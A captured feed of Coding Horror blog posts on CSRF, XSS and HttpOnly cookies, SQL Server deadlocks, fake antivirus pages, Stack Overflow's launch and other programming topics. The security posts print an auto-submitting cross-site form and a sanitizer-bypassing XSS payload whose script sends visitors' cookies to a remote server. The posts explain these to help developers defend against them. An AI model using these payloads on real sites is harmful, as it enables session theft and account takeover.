http://www.codinghorror.com/blog/
programming and human factors - Jeff Atwood
Last checked 33 minutes ago.
87 people have subscribed to this feed.
post frequency (last month)
PostRank™
From Coding Horror, 18 days ago,
0 comments
As the web becomes more and more pervasive, so do web-based security vulnerabilities. I talked a little bit about the most common web vulnerability, cross-site scripting, in Protecting Your Cookies: HttpOnly. Although XSS is incredibly dangerous, it's a fairly straightforward exploit to understand. Do not allow users to insert arbitrary HTML on your site. The name of the XSS game is sanitizing user input. If you stick to a whitelist based approach -- only allow input that you know to be good, and immediately discard anything else -- then you're usually well on your way to solving any XSS problems you might have.
I thought we had our website vulnerabilies licked with XSS. I was wrong. Steve Sanderson explains:
Since XSS gets all the limelight, few developers pay much attention to another form of attack that's equally destructive and potentially far easier to exploit. Your application can be vulnerable to cross-site request forgery (CSRF) attacks not because you the developer did something wrong (as in, failing to encode outputs leads to XSS), but simply because of how the whole Web is designed to work. Scary!
It turns out I didn't understand how cross-site request forgery, also known as XSRF or CSRF, works. It's not complicated, necessarily, but it's more.. subtle.. than XSS.
Let's say we allow users to post images on our forum. What if one of our users posted this image?
<img src="http://foo.com/logout">
Not really an image, true, but it will force the target URL to be retrieved by any random user who happens to browse that page -- using their browser credentials! From the webserver's perspective, there is no difference whatsoever between a real user initiated browser request and the above image URL retrieval.
If our logout page was a simple HTTP GET that required no confirmation, every user who visited that page would immediately be logged out. That's XSRF in action. Not necessarily dangerous, but annoying. Not too difficult to envision much more destructive versions of this technique, is it?
There are two obvious ways around this sort of basic XSRF attack:
Easy fix, right? We probably should never have never done either of these things in the first place. Duh!
Not so fast. Even with both of the above fixes, you are still vulnerable to XSRF attacks. Let's say I took my own advice, and converted the logout form to a HTTP POST, with a big button titled "Log Me Out" confirming the action. What's to stop a malicious user from placing a form like this on their own website ..
<body onload="document.getElementById('f').submit()">
<form id="f" action="http://foo.com/logout" method="post">
<input name="Log Me Out" value="Log Me Out" />
</form>
</body>
.. and then convincing other users to click on it?
Remember, the browser will happily act on this request, submitting this form along with all necessary cookies and credentials directly to your website. Blam. Logged out. Exactly as if they had clicked on the "Log Me Out" button themselves.
Sure, it takes a tiny bit more social engineering to convince users to visit some random web page, but it's not much. And the possibilities for attack are enormous: with XSRF, malicious users can initiate any arbitrary action they like on a target website. All they need to do is trick unwary users of your website -- who already have a validated user session cookie stored in their browser -- into clicking on their links.
So what can we do to protect our websites from these kinds of cross site request forgeries?
XmlHttpRequest function.
XmlHttpRequest calls can't read cookies. If either of the values don't match, discard the input as spoofed. The only downside to this approach is that it does require your users to have JavaScript enabled, otherwise their own form submissions will be rejected.
If your web site is vulnerable to XSRF, you're in good company. Digg, GMail, and Wikipedia have all been successfully attacked this way before.
Maybe you're already protected from XSRF. Some web frameworks provide built in protection for XSRF attacks, usually through unique form tokens. But do you know for sure? Don't make the same mistake I did! Understand how XSRF works and ensure you're protected before it becomes a problem.
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
From Coding Horror, 22 days ago,
0 comments
By now I'm sure you've at least heard of, if not already seen, the new Windows Vista advertisements featuring Bill Gates and Jerry Seinfeld. They haven't been well received, to put it mildly, but the latest commercial is actually not bad in its longer 4 minute version:
On the whole, I'd call these ads opaque bordering on inane. Rumor has it the entire thing has been cancelled. It wasn't entirely unsuccessful, I suppose; the goal of advertising is to get people talking about it. Even if every one of those conversations starts with "what the hell were they thinking", hey -- it's a conversation. About an ad. The ad agencies have won.
I guess Microsoft figured it had to do something to counter the long running "I'm a Mac, I'm a PC" ads from Apple. I secretly love these ads, because the hidden subtext is that if you use a PC, you're as cool as John Hodgman:
My problem with these ads begins with the casting. As the Mac character, Justin Long (who was in the forgettable movie Dodgeball and the forgettabler TV show Ed) is just the sort of unshaven, hoodie-wearing, hands-in-pockets hipster we've always imagined when picturing a Mac enthusiast. He's perfect. Too perfect. It's like Apple is parodying its own image while also cementing it. If the idea was to reach out to new types of consumers (the kind who aren't already evangelizing for Macs), they ought to have used a different type of actor.Meanwhile, the PC is played by John Hodgman -- contributor to The Daily Show and This American Life, host of an amusing lecture series, and all-around dry-wit extraordinaire. Even as he plays the chump in these Apple spots, his humor and likability are evident. (Look at that hilariously perfect pratfall he pulls off in the spot titled "Viruses.") The ads pose a seemingly obvious question -- would you rather be the laid-back young dude or the portly old dweeb? -- but I found myself consistently giving the "wrong" answer: I'd much sooner associate myself with Hodgman than with Long.
The sleight of hand breaks down a bit when you realize that Hodgman actually uses Macs, but that's advertising for you: a giant pack of lies. In other breaking news, water still wet, sky still blue.
The reason I bring this up is not to fan the eternal flame of platform wars, but to highlight one interesting little detail in the ad. At about 1:05, you'll see Gates reading a bedtime story to the family's son from some obscure technical tome or other. But not just any technical tome -- he's reading from the book that this very blog is named after, my all-time favorite programming book, Steve McConnell's Code Complete.
You can use [the table driven method] approach in any object-oriented language. It's less error-prone, more maintainable and more efficient than lengthy if statements, case statements or copious subclasses. The fact that a design uses inheritance and polymorphism doesn't make it a good design. The rote object-oriented design described earlier in the "Object-Oriented Approach" section would require as much code as a rote functional design -- or more.
The above is excerpted from Chapter 18 of "Table-Driven Methods", on page 423. You might argue that I have an unhealthy fascination with Steve McConnell and Code Complete. You wouldn't be wrong.
I'm probably preaching to the choir here, but I doubt it's a coincidence that Gates chose that particular book; I'm sure it's one of his all time favorite books, too.
Hat tip to Matthew Eckstein for pointing this one out!
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
From Coding Horror, 25 days ago,
0 comments
I'm in no way trying to conflate this with the meaning of my last blog post, but after a six month gestation, we just gave birth to a public website.
Of course, I'm making a sly little joke here about community, but I really believe in this stuff. Stack Overflow is, as much as I could make it, an effort of collective programmer community.
Here's the original vision statement for Stack Overflow from back in April:
So what is stackoverflow?From day one, my blog has been about putting helpful information out into the world. I never had any particular aspirations for this blog to become what it is today; I'm humbled and gratified by its amazing success. It has quite literally changed my life. Blogs are fantastic resources, but as much as I might encourage my fellow programmers to blog, not everyone has the time or inclination to start a blog. There's far too much great programming information trapped in forums, buried in online help, or hidden away in books that nobody buys any more. We'd like to unlock all that. Let's create something that makes it easy to participate, and put it online in a form that is trivially easy to find.
Are you familiar with the movie pitch formula?
Stackoverflow is sort of like the anti-experts-exchange (minus the nausea-inducing sleaze and quasi-legal search engine gaming) meets wikipedia meets programming reddit. It is by programmers, for programmers, with the ultimate intent of collectively increasing the sum total of good programming knowledge in the world. No matter what programming language you use, or what operating system you call home. Better programming is our goal.
Although reaction has generally been positive, there has been a bit of backlash. Some have promoted the idea that Stack Overflow will only contribute to the increasing dumbenation of the world's developers. I think this is, in a word, horsecrap. I liked Joel's response to this in podcast 21 (mp3):
And it is true that we are all, as developers, hopelessly incompetent. The goal of a site like Stack Overflow is to somehow share the correct knowledge wherever it may be as it is scattered throughout the universe, and to cause that to be voted up and to be spread amongst us. There's this big universe of dumb programmers, and I'm one of them, and we all have a little bit of knowledge. I may know how to do this thing in VB6 which may be useful to somebody one day who's trying to maintain some ridiculously old piece of crap code. We all have these little tiny pieces of information and if we can just contribute a little bit, that information gets amplified, and maybe a thousand other dumb developers will benefit from my one little piece of good information.
And here's my response, from the same podcast episode, to all those who turn up their noses at community sites like this, preferring the input of "experts":
The idea that you have all these experts waiting in the wings to do stuff is an illusion in my experience. There's really just a bunch of amateurs muddling along trying to do things together. The people that are truly experts are too busy to even help, right? And if the experts are too busy to help, what difference does it really make if there are experts at all. Because the whole point of this endeavor is helping other developers, and whether you're an expert or not, if you have no time to help, you're not really contributing to the solution.
Stack Overflow is by no means done. We're still technically in public beta. But I believe what we have -- the confluence of wiki, discussion, blog, and reddit/digg ranking systems -- is a fair representation of our original vision for Stack Overflow.
It's a place where a busy programmer can invest a few minutes with as little friction as possible, and get something tangible from the community in return.
But who cares what I think; my opinion holds no particular weight. I'm just a member. This is our site. You tell me: how dumb are we?
| [advertisement] Peer Code Review. No meetings. No busy-work. Customizable workflows and reports. Try Jolt Award-winning Code Collaborator. |
From Coding Horror, 1 month ago,
0 comments
I don't usually talk about my personal life here, but I have to make an exception in this case.
I debated for days which geeky reference I would use as a synonym for "we're having a baby". The title is the best I could do. I'm truly sorry.
As an aside, this is something my wife and I have worked at for a number of years, and was only truly possible through the Miracle of Sciencetm. Despite the best of intentions, you really start to resent all those teenage couples who manage to get pregnant so awkwardly and accidentally. Oh, that's right! You have sex! It's so obvious in retrospect!
Not that managing to procreate is anything special compared to programming. Just ask the inestimable Richard Stallman:
It doesn't take special talents to reproduce -- even plants can do it. On the other hand, contributing to a program like Emacs takes real skill. That is really something to be proud of.It helps more people, too.
At any rate, I'm looking forward to stocking our unborn child's mind with all my insane, crazy ideas. I think Dave Eggers said it best in A Heartbreaking Work of Staggering Genius, describing a road trip he took with his younger brother after the death of his parents:
His brain is my laboratory, my depository. Into it I can stuff the books I choose, the television shows, the movies, my opinion about elected officials, historical events, neighbors, passersby. He is my twenty-four-hour classroom, my captive audience, forced to ingest everything I deem worthwhile. He is a lucky, lucky boy! And no one can stop me. He is mine, and you cannot stop me, cannot stop us. Try to stop us, you pu**y! You can't stop us from singing, and you can't stop us from making fart sounds, from putting our hands out the window to test the aerodynamics of different hand formations, from wiping the contents of our noses under the front of our seats.We cannot be stopped from looking with pity upon all the world's sorry inhabitants, they unblessed by our charms, unchallenged by our trials, unscarred and thus weak, gelatinous. You cannot stop me from telling Toph to make comments about and faces at the people in the next lane.
It's unfair. The matchups, Us. v. Them (or you) are unfair. We are dangerous. We are daring and immortal. Fog whips up from under the cliffs and billows over the highway. Blue breaks from beyond the fog and sun suddenly screams from the blue.
I guess what I'm trying to say is that, with any luck, he or she will be scarred for life. That's a proud family tradition where I come from.
| [advertisement] Peer code review without meetings, paperwork, or stopwatches? No wonder Code Collaborator won the Jolt Award. |
From Coding Horror, 1 month ago,
0 comments
So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
<script>alert('hello XSS!');</script>
In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u=" +document.links[1].text +"&l="+document.links[1] +"&c="+document.cookie;
That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Encoding: gzip Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly X-Powered-By: ASP.NET Date: Tue, 26 Aug 2008 10:51:08 GMT Content-Length: 2838
This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here's what we know:
document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
From Coding Horror, 1 month ago,
0 comments
You may have noticed that my posting frequency has declined over the last three weeks. That's because I've been busy building that Stack Overflow thing we talked about.
It's going well so far. Joel Spolsky also seems to think it's going well, but he's one of the founders so he's clearly biased. For what it's worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn't contacted him in any way; I myself only found out about his reaction third hand.
That's not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:
Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.
Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?
Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock -- everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:
UPDATE [Posts] SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3 WHERE [Id] = @p0
If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose -- specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:
SELECT * FROM [Posts] WHERE [ParentId] = @p0
(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.
If you aren't eating -- modifying data -- then how can trivial super-fast reads be blocked on rare writes? We've had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I'm deeply uncomfortable with errors I don't fully understand. This is the kind of stuff that quite literally keeps me up at night.
I'll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it's certainly possible. We racked our brains and our code, and couldn't come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain't rocket surgery.
If you ever have to troubleshoot database deadlocks, you'll inevitably discover the NOLOCK statement. It works like this:
SELECT * FROM [Posts] with (nolock) WHERE [ParentId] = @p0
It isn't just a SQL Server command -- it also applies to Oracle and MySQL. This sets the transaction isolation level to read uncommitted, also known as "dirty reads". It tells the query to use the lowest possible levels of locking.
But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You'll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It's true: the theory is scary. But here's what I think:
In theory there is no difference between theory and practice. In practice there is.
I would never recommend using nolock as a general "good for what ails you" snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.
But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they've never seen any adverse reaction when using nolock. As long as you know what you're doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!
With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it's never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?
Adding nolock to every single one of our queries wasn't really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.
I'm no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:
The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity ... there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.
Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we're building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:
Snapshots rely on an entirely new data change tracking method ... more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
I'm a little disappointed that SQL Server treats our silly little web app like it's a banking application. I think it's incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySql deadlocks. I'm guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.
I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it's easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can't help thinking our particular database vendor just isn't as optimistic as they perhaps should be.
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
From Coding Horror, 1 month ago,
0 comments
I consider this the golden rule of source control:
Check in early, check in often.
Developers who work for long periods -- and by long I mean more than a day -- without checking anything into source control are setting themselves up for some serious integration headaches down the line. Damon Poole concurs:
Developers often put off checking in. They put it off because they don't want to affect other people too early and they don't want to get blamed for breaking the build. But this leads to other problems such as losing work or not being able to go back to previous versions.My rule of thumb is "check-in early and often", but with the caveat that you have access to private versioning. If a check-in is immediately visible to other users, then you run the risk of introducing immature changes and/or breaking the build.
I'd much rather have small fragments checked in periodically than to go long periods with no idea whatsoever what my coworkers are writing. As far as I'm concerned, if the code isn't checked into source control, it doesn't exist. I suppose this is yet another form of Don't Go Dark; the code is invisible until it exists in the repository in some form.
I'm not proposing developers check in broken code -- but I also argue that there's a big difference between broken code and incomplete code. Isn't it possible, perhaps even desirable, to write your code and structure your source control tree in such a way that you can check your code in periodically as you're building it? I'd much rather have empty stubs and basic API skeletons in place than nothing at all. I can integrate my code against stubs. I can do code review on stubs. I can even help you build out the stubs!
But when there's nothing in source control for days or weeks, and then a giant dollop of code is suddenly dropped on the team's doorstep -- none of that is possible.
Developers that wouldn't even consider adopting the old-school waterfall method of software development somehow have no problem adopting essentially the very same model when it comes to their source control habits.
Perhaps what we need is a model of software accretion. Start with a tiny fragment of code that does almost nothing. Look on the bright side -- code that does nothing can't have many bugs! Test it, and check it in. Add one more small feature. Test that feature, and check it in. Add another small feature. Test that, and check it in. Daily. Hourly, even. You always have functional software. It may not do much, but it runs. And with every checkin it becomes infinitesimally more functional.
If you learn to check in early and check in often, you'll have ample time for feedback, integration, and review along the way. And who knows -- you might even manage to accrete that pearl of final code that you were looking for, too.
| [advertisement] Peer Code Review. No meetings. No busy-work. Customizable workflows and reports. Try Jolt Award-winning Code Collaborator. |
From Coding Horror, 1 month ago,
0 comments
As a software developer, tell me if you've ever done this:
And let's not forget the common goating technique where you take a screenshot of someone's desktop, make it the desktop background, then proceed to hide every UI element on the screen. The anguished cries as users desperately double-triple-quadruple click on pixels that look exactly like real user interfaces can typically be heard for miles.
I bring this up to generate some sympathy. I get fooled by my own FUI -- Fake User Interface -- at least once a month. If it can happen to us, it can happen to anyone. Which means FUI can be quite dangerous in the wrong hands. Consider Ryan Meray's story:
Okay, so here's an interesting one. My girlfriend is researching stuff on lilies, so she's trying to find the website for the Michigan Regional Lily Society.The website address is http://www.mrls.org/
Feel free and browse there directly, there's nothing wrong with it. But if you don't remember the URL, your first response is to Google it. We google and get this:
http://www.google.com/search?q=Michigan+Regional+Lily+Society
Now, if you're in Firefox, everything is fine. You click that first result, and you get to their website, and you learn about lilies.
However, if you are using IE, be aware, you are about to have a Spyware/Virus alert.
Obviously, the poor Michigian Regional Lily Society has fallen prey to website hackers. (Note that it may have been fixed by the time I'm writing this -- but I duplicated everything I'm about to show you.)
The first clever point is that the website appears fine if you navigate there directly. The malicious JavaScript code inserted into the page checks the referer and does something different if you arrive there via a web search engine. This means the people who own the website, and never arrive there through Google, would be scratching their heads, wondering what all the fuss is about. So the hack survives longer.
But if you do arrive at the MRLS site through a search engine, like a huge percentage of the world does, you're redirected to:
http://scanner.antivir64.com/?aff=1050
The very first thing this page does is minimize the browser (Firefox 3, in this case) and present us with this JavaScript alert:
I'm intentionally juxtaposing the browser and the dialog here, but the browser is way off in the very lower right corner of the display and that dialog is smack dab in the middle of the screen. It is not at all clear that the dialog originated from that web page. It's a primitive technique, but it is surprisingly effective.
I didn't have the guts to click OK on that dialog; I clicked the close button. The browser then expanded to show this convincing "real time virus scan".
The static screenshot does not do it justice; the scrollbar moves, the list of files fly by as they are "scanned", and the web page rather successfully simulates an ersatz UI somewhere between Windows XP and Windows Vista. Of course, we know this Fake User Interface is completely invalid, because it is running in the browser, not on our PC. You and I may understand that distinction, but what about your parents? Your wife? Your children? Your less technically savvy friends? Will they understand this scary, authentic looking virus warning coming from an "encrypted secure site" is all a lie?
Honestly, whose PC doesn't "run slower than normal"? Maybe I would want to know if my computer is infected with Viruses, Adware or Spyware. It's all part of the culture of fear that security software companies -- and let's be honest, Windows security software companies -- cultivate so they can rake in millions of dollars per year hawking their software. The difference here, of course, is that it's increasingly difficult to tell the good guys from the bad guys. That's the downside of fear as a selling point: it cuts equally well in both directions.
Woe betide the poor user who is convinced through the trickery of FUI to install this "antivirus" software. The page does its darndest to convince you to run its payload executable. Any click on the page, no matter where, is interpreted as a download request.
The page also attempts a drive-by download, though those have been auto-blocked for years now.
It's tempting to put this down as yet another iteration of phishing, the forever hack. To be fair, this is exactly the sort of thing web browser phishing filters were designed to prevent. This site was already in the Firefox 3 phishing filter -- but it was not caught by the Internet Explorer 7 phishing filter, so I reported it.
I am all for phishing filters as another important line of defense, but like all distributed blacklists, they're only so effective.
What I'm more concerned about here is how well the user interface was spoofed. The browser FUI was convincing enough to even make me -- possibly the world's most jaded and cynical Windows user -- do a bit of a double-take. How do you protect naive users from cleverly designed FUI exploits like this one? Can you imagine your mother doing a web search on flowers -- flowers, for God's sake -- clicking on the search results to a totally legitimate website, and correctly navigating the resulting maze of fake UI, spurious javascript alerts, and download dialogs?
I know I can't. As much as I admire distributed phishing blacklist efforts, there's no way they can possibly keep pace with the rapid setup and teardown of hacked websites. How many compromised websites are out there? How many unsophisticated users surf the internet every day?
As always, we can lay a big part of the blame at Microsoft's doorstep for not adopting the UNIX policy of non-administrator accounts for regular users. But then again, if the spoofing is good enough, the FUI extra-convincing, even a Linux or OS X user could be coerced into entering their admin password for a "system security scan". Or maybe they just wanted to see the dancing bunnies.
And then, like Ryan, you're likely to end up with the same infected computer, and the same distraught spouse. All this for the love of a few lilies.
Short of user education, which is a neverending, continuous uphill battle -- how would you combat a perfectly spoofed FUI presented to a naive user?
| [advertisement] Peer code review without meetings, paperwork, or stopwatches? No wonder Code Collaborator won the Jolt Award. |
From Coding Horror, 1 month ago,
0 comments
One of the early technology decisions we made on Stack Overflow was to go with a fairly JavaScript intensive site. Like many programmers, I've been historically ambivalent about JavaScript:
However, it's difficult to argue with the demonstrated success of JavaScript over the last few years. JavaScript code has gone from being a peculiar website oddity to -- dare I say it -- delivering useful core features on websites I visit on a daily basis. Paul Graham had this to say on the definition of Web 2.0 in 2005:
One ingredient of its meaning is certainly Ajax, which I can still only just bear to use without scare quotes. Basically, what "Ajax" means is "Javascript now works." And that in turn means that web-based applications can now be made to work much more like desktop ones.
Three years on, I can't argue the point: JavaScript now works. Just look around you on the web.
Well, to a point. We can no longer luxuriate in the -- and to be clear, I mean this ironically -- golden age of Internet Explorer 6. We live in a brave new era of increasing browser competition, and that's a good thing. Yes, JavaScript is now mature enough and ubiquitous enough and fast enough to be a viable client programming runtime. But this vibrant browser competition also means there are hundreds of aggravating differences in JavaScript implementations between Opera, Safari, Internet Explorer, and Firefox. And that's just the big four. It is excruciatingly painful to write and test your complex JavaScript code across (n) browsers and (n) operating systems. It'll make you pine for the good old days of HTML 4.0 and CGI.
But now something else is happening, something arguably even more significant than "JavaScript now works". The rise of commonly available JavaScript frameworks means you can write to higher level JavaScript APIs that are guaranteed to work across multiple browsers. These frameworks spackle over the JavaScript implementation differences between browsers, and they've (mostly) done all the ugly grunt work of testing their APIs and validating them against a host of popular browsers and plaforms.
The JavaScript Ninjas have delivered their secret and ultimate weapon: common APIs. They transform working with JavaScript from an unpleasant, write-once-debug-everywhere chore into something that's actually -- dare I say it -- fun.
Frankly, it is foolish to even consider rolling your own JavaScript code to do even the most trivial of things in a browser now. Instead, choose one of these mature, widely tested JavaScript API frameworks. Spend a little time learning it. You'll ultimately write less code that does more -- and (almost) never have to worry a lick about browser compatibility. It's basically browser coding nirvana, as Rick Strahl noted:
I've kind of fallen into a couple of very client heavy projects and jQuery is turning out to be a key part in these particular projects. jQuery is definitely one of those tools that has got me really excited as it has changed my perspective in Web Development considerably from dreading doing client development to actually looking forward to applying richer and more interactive client principles.
There are several popular Javascript API frameworks to choose from:
I don't profess to be an expert in any of these. Far from it. But I will echo what Rick said: using JQuery while writing Stack Overflow is probably the only time in my entire career as a programmer that I have enjoyed writing JavaScript code.
It's sure pleasant to write code against solid, increasingly standardized JavaScript API libraries that spackle over all those infuriating browser differences. I, for one, would like to thank John Resig and all the other JavaScript Ninjas who share their secrets -- and their frameworks -- with the rest of the community.
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
From Coding Horror, 2 months ago,
0 comments
Occasionally people will ask me what kind of music I like to code by. I'm not sure I am the right person to ask this question of.
Allow me to explain by citing my 2001 Amazon review of a particular album.
It all started so innocently. I purchased this CD on a lark in mid 1998.Subsequently, I put on this CD at high volume to torture my then-coworkers. It became a running joke. We'd take any opportunity, any pretext at all, to put it on. It had to be played at least once every day for "good luck." We'd force each other to listen to it. We'd have little contests to see who was man enough to listen to it over and over and still silently sit there programming away, not complaining. Sometimes we'd sing along to enhance the effect.
In short: we broke people. It was like a Vietnamese prison camp in stereo.
It was a joke. But then a very strange thing happened -- as I listened to the CD over and over, I began to like it. I mean really like it! I began to listen to it at home on my own time. "There's something about this music", I thought, as I listened to it for the 543rd time. "Maybe it's so bad, it has actually wrapped all the way around and it's.. good again?". I played the album for my wife. At that point I was hooked. I knew all the words to "Having my Baby", and.. I liked it!
For completeness, here's the track list. If you have any kind of musical taste, you may want to look away from the screen momentarily.
In a peculiar twist of fate, one of my then coworkers, Geoff, now works with me on Stack Overflow. He can confirm that what I said above actually happened, although I'm not sure you could make something like that up. Apparently his mind wasn't totally destroyed by exposure to this "music". As far as we know.
While I've mentioned mild forms of coworker griefing -- er, I mean, teambuilding -- before in Don't Forget to Lock Your Computer, I thought this audio form was unique.
What I didn't know then is that this sort of musical griefing had a precedent. It's documented in the 1994 book Show Stopper! The Breakneck Race to Create Windows NT and the Next Generation at Microsoft. I didn't get around to reading this excellent book until 2004, but it's right there in black and white:
